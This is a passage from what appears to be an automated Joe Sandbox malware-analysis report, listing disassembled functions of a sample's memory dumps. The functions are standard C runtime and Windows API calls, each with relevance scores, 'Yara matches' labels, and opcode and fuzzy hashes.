Instruction Fuzzy Hash: 01014E71900617A7DB10F774CD84B9DB76ABF86310F144152E904972C0DB78EB198F9A

Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
__alloca_probe_16.LIBCMT ref: 004321C6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
__alloca_probe_16.LIBCMT ref: 004322AB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
__freea.LIBCMT ref: 0043231B

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

__freea.LIBCMT ref: 00432324
__freea.LIBCMT ref: 00432349

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698

Function 02541129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02542141: GetLastError.KERNEL32(?,?,0253A9EC,?,00000000,?,0253CDE6,0251247E,00000000,?,00451F20), ref: 02542145
Part of subcall function 02542141: _free.LIBCMT ref: 02542178
Part of subcall function 02542141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025421B9

_free.LIBCMT ref: 02541444
_free.LIBCMT ref: 0254145D
_free.LIBCMT ref: 0254148F
_free.LIBCMT ref: 02541498
_free.LIBCMT ref: 025414A4

Strings

C, xrefs: 02541291

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction ID: 3b888aa36364173fc7f413635afa7299370984812fe718e4b0adc724ce8ce0a7
Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction Fuzzy Hash: 6BB11875A0161A9BDB24DF18C884BADF7B5FB48308F5085AAD94DA7350DB30AE90CF48

Function 0254A115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0254A184
_free.LIBCMT ref: 0254A192
_free.LIBCMT ref: 0254A2C0
_free.LIBCMT ref: 0254A2CB

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction ID: aff886f5d778e00520dd541669a736908840e14fe951788603cf8628e08ed9bb
Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction Fuzzy Hash: 8C612131944206AFDB60CF68C841B9AFBF5FF84314F2041AAEC54EB241EB719941DF58

Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F1D
_free.LIBCMT ref: 00439F2B
_free.LIBCMT ref: 0043A059
_free.LIBCMT ref: 0043A064

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59

Function 02543AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0253C4A4,E0830C40,?,?,?,?,?,?,0254425F,0251E03C,0253C4A4,?,0253C4A4,0253C4A4,0251E03C), ref: 02543B2C
__fassign.LIBCMT ref: 02543BA7
__fassign.LIBCMT ref: 02543BC2
WideCharToMultiByte.KERNEL32(?,00000000,0253C4A4,00000001,?,00000005,00000000,00000000), ref: 02543BE8
WriteFile.KERNEL32(?,?,00000000,0254425F,00000000,?,?,?,?,?,?,?,?,?,0254425F,0251E03C), ref: 02543C07
WriteFile.KERNEL32(?,0251E03C,00000001,0254425F,00000000,?,?,?,?,?,?,?,?,?,0254425F,0251E03C), ref: 02543C40

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction ID: c9ff98f99de9d1f0d3999aac4db33f4ea623d0f77d22530de7e9fa0debb07eaf
Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction Fuzzy Hash: 1751C674900209AFCB14CFA8D885BEEFBF4FF09715F24415AE555E72A1DB309641CB68

Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
__fassign.LIBCMT ref: 00433940
__fassign.LIBCMT ref: 0043395B
WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69

Function 02534AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02534ACD

Part of subcall function 02534D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,02534800), ref: 02534DAC

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02534AE2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02534AF1
__CxxThrowException@8.LIBVCRUNTIME ref: 02534AFF
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02534B75
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02534BB5
__CxxThrowException@8.LIBVCRUNTIME ref: 02534BC3

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID:
API String ID: 3151764488-0
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: c44ae5673bf02c33925927aa1e0d05369440ee4126f1932df9c0ae304d2bd29e
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 1331F935A002159BCF06EF64C891BADB7B6FF85320F204565E915AB241DB70EE05CB98

Function 0254FBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction ID: d3993d0d335431955946a8c74be5e30365e4d72001ba480f472c5bd3fb65b6d9
Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction Fuzzy Hash: 93117271508116BBDB216F7ADC48A6BBBADFFC2B65B100A65FC15D7150DE308901CAA8

Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669

Function 0254A5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0254A331: _free.LIBCMT ref: 0254A35A

_free.LIBCMT ref: 0254A638

Part of subcall function 025436D1: HeapFree.KERNEL32(00000000,00000000,?,0254A35F,?,00000000,?,00000000,?,0254A603,?,00000007,?,?,0254A9F7,?), ref: 025436E7
Part of subcall function 025436D1: GetLastError.KERNEL32(?,?,0254A35F,?,00000000,?,00000000,?,0254A603,?,00000007,?,?,0254A9F7,?,?), ref: 025436F9

_free.LIBCMT ref: 0254A643
_free.LIBCMT ref: 0254A64E
_free.LIBCMT ref: 0254A6A2
_free.LIBCMT ref: 0254A6AD
_free.LIBCMT ref: 0254A6B8
_free.LIBCMT ref: 0254A6C3

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: d54c1f964875cbc965b5e16dda0eb74e942803baa30a90b442f37054353f023f
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: F3118431695B06BADEA0B771CC55FCFF79EFF80708F400824A299AA160EE64B9144F58

Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3

_free.LIBCMT ref: 0043A3D1

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A3DC
_free.LIBCMT ref: 0043A3E7
_free.LIBCMT ref: 0043A43B
_free.LIBCMT ref: 0043A446
_free.LIBCMT ref: 0043A451
_free.LIBCMT ref: 0043A45C

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46

Function 02522659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 02522667
GetLastError.KERNEL32 ref: 0252266D
GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 0252269A
GetLastError.KERNEL32 ref: 025226A4
GetLastError.KERNEL32 ref: 025226B6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025226CC
__CxxThrowException@8.LIBVCRUNTIME ref: 025226DA

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction ID: 1ce0ca8704a2b6313c365ad5492dcc7fc5f7ab704809567b9d471a168cfbb341
Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction Fuzzy Hash: 3701483E501125A7D725AF65DC48FAF3B69BF43B51F500925F805E20D0DF24EA088A6C

Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412400
GetLastError.KERNEL32 ref: 00412406
GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412433
GetLastError.KERNEL32 ref: 0041243D
GetLastError.KERNEL32 ref: 0041244F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
__CxxThrowException@8.LIBVCRUNTIME ref: 00412473

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D

Function 025224A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0252670B), ref: 025224B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 025224C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 025224D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0252670B), ref: 02522500
GetProcAddress.KERNEL32(00000000), ref: 02522507
GetLastError.KERNEL32(?,?,?,0252670B), ref: 02522522
GetLastError.KERNEL32(?,?,?,0252670B), ref: 0252252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02522544
__CxxThrowException@8.LIBVCRUNTIME ref: 02522552

Strings

kernel32.dll, xrefs: 025224B0, 025224B5, 025224FA

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction ID: a4d3d16e16ec3e3f4e3b66257c218550f5cf86762a7cddcc135931b11547321c
Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction Fuzzy Hash: 09F086799003203FB7113B75BC5995B3FADED47A23B20062AF811E21D1EB758945896C

Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C677

Strings

F(@, xrefs: 0040C61B
ios_base::failbit set, xrefs: 0040C644
ios_base::badbit set, xrefs: 0040C63A, 0040C65A
ios_base::eofbit set, xrefs: 0040C649
F(@, xrefs: 0040C651

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Exception@8Throw
String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-3619870194
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C

Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

_memcmp.LIBVCRUNTIME ref: 0043116C
_free.LIBCMT ref: 004311DD
_free.LIBCMT ref: 004311F6
_free.LIBCMT ref: 00431228
_free.LIBCMT ref: 00431231
_free.LIBCMT ref: 0043123D

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44

Function 0254239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,025425EC,00000001,00000001,?), ref: 025423F5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,025425EC,00000001,00000001,?,?,?,?), ref: 0254247B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02542575
__freea.LIBCMT ref: 02542582

Part of subcall function 0254390E: RtlAllocateHeap.NTDLL(00000000,0251DAD7,00000000), ref: 02543940

__freea.LIBCMT ref: 0254258B
__freea.LIBCMT ref: 025425B0

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction ID: d194807e252cbca8bf0b1be27abb72e077c6b1b4bd8fa0aec82e747957de76ee
Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction Fuzzy Hash: D851C372A10227ABDB258F64CC60EEEBBAAFB84758F154628FC04DB150DF74DC50CA58

Function 0253E419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0253E445
__cftoe.LIBCMT ref: 0253E477

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction ID: 3e6ed52b2c539f32d989eb5ceaf93f0a47279460e90a6c3654956f7de90791da
Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction Fuzzy Hash: 8851EC33900206ABDF269F58CC42BAEBBE9BF8D334F145259F815D61D1EB31D9108A6C

Function 0253302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02533051

Part of subcall function 02528AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02528ABD

SafeSQueue.LIBCONCRT ref: 0253306A
Concurrency::location::_Assign.LIBCMT ref: 0253312A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0253314B
__CxxThrowException@8.LIBVCRUNTIME ref: 02533159

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3496964030-0
Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction ID: 345c7145d5a74f1b7a14ccc1362b770a3c8fcaf72749ed3b752ea67b6b440ee2
Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction Fuzzy Hash: ED31A231A00A12AFCB26EF74C844B7ABBB5FF84720F145599D8069B291DB70E945CFD8

Function 02515437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

__Cnd_init.LIBCPMT ref: 0251544B
__Mtx_init.LIBCPMT ref: 02515471
std::_Cnd_initX.LIBCPMT ref: 02515494
__Thrd_start.LIBCPMT ref: 025154B9
std::_Cnd_waitX.LIBCPMT ref: 025154D9
std::_Cnd_initX.LIBCPMT ref: 02515506

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: a685037b2ca0b4f197dcd4249a5e37106a5f8a5dfe0c97e748bd3dc47d8cf608
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: 0321B472C0130AAAFF05EBF8D841BDDBBF9BF88325F144019E104B7180EB7889448B29

Function 02539041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,02539038,025369C9,02550907,00000008,02550C6C,?,?,?,?,02533CB2,?,?,0045A064), ref: 0253904F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0253905D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02539076
SetLastError.KERNEL32(00000000,?,02539038,025369C9,02550907,00000008,02550C6C,?,?,?,?,02533CB2,?,?,0045A064), ref: 025390C8

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: e8107fefb8261f35b6ac8780fe81ae4740c6078300e58de737fcef2000c4f0cc
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 9301F7B22097126EA72727F4EC88A772B85FB45775B301339F520452E0EFA2C8104D8D

Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,A6B3B75B), ref: 00428DE8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,A6B3B75B), ref: 00428E61

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
